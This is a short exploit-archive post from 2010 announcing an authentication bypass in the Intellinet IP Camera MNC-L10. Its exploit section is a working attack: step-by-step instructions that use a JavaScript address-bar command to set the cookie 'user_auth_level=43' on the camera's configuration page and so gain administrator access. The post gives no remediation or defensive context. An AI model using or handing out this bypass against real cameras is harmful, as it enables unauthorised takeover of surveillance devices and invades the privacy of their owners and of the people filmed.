Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability
# Published : 2010-08-01
# Author : Magnefikko
# Previous Title : Joomla Component PBBooking 1.0.4_3 Multiple Blind SQL Injection
# Next Title : Joomla Component Spielothek 1.6.9 Multiple Blind SQL Injection

by Magnefikko
Discovered: 25.01.2009
Publication: 01.08.2010
magnefikko@gmail.com
Promhyl Studies :: http://promhyl.tk
Inj3ct0r Team :: http://inj3ct0r.com
Subgroup: #PRekambr
Name: Intellinet IP Camera Admin Access
Platform: Intellinet IP Camera MNC-L10 and other


...:: Exploit ::...

JS is required.

1. Go to http://cameraip/main_configure.cgi
2. Write in address bar:
--- code ---
javascript:document.cookie="user_auth_level=43";document.location=document.location
--- code ---
3. Push enter.

or add cookie with another method.


----== Promhyl Studies :: http://promhyl.tk ==----
----== Inj3ct0r Team :: http://inj3ct0r.com ==----